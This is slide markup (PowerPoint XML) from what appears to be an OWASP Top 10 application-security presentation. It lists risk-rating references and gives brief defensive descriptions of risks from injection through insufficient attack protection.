                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId6"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId6"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>FAIR Information Risk Framework</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modeling Tool</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFil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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="578090457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="3873909"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="3492909">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> may </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization.  Together, these factors determine your</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>overall risk.</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211673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609600" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-609600" y="990600"/>
              <a:ext cx="8153400" cy="8001000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1071787"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="995312"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A1 – Injection</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1874768"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently).</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="1798293"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A2 – Broken Authentication and Session Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="2677749"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="2601274"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A3 – Cross-Site Scripting (XSS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="3480730"/>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1000" dirty="0"/>
                <a:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>unauthorized functionality and/or data, such as access other </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>users' accounts, view sensitive files, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>modify other users’ data, change access rights, etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="3404256"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A4 – Broken Access Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="4283711"/>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1000" dirty="0"/>
                <a:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="4207237"/>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n-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>A5 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>– Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Misconfiguration</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5086692"/>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1000" dirty="0"/>
                <a:t>Many web </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>applications and APIs </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>browser</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5010218"/>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n-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>A6 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>– Sensitive Data Exposure</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5889673"/>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1000" dirty="0" smtClean="0"/>
                <a:t>The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>majority of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>applications and APIs </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>lack the basic ability to detect, prevent, and respond to both manual and automated attacks. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>Attack protection goes </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>far beyond basic input validation and involves </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>automatically detecting, logging, responding, and even blocking exploit attempts. Application owners </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>also need to be able to deploy patches quickly to protect against attacks.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5813199"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A7 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Insufficient Attack Protection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
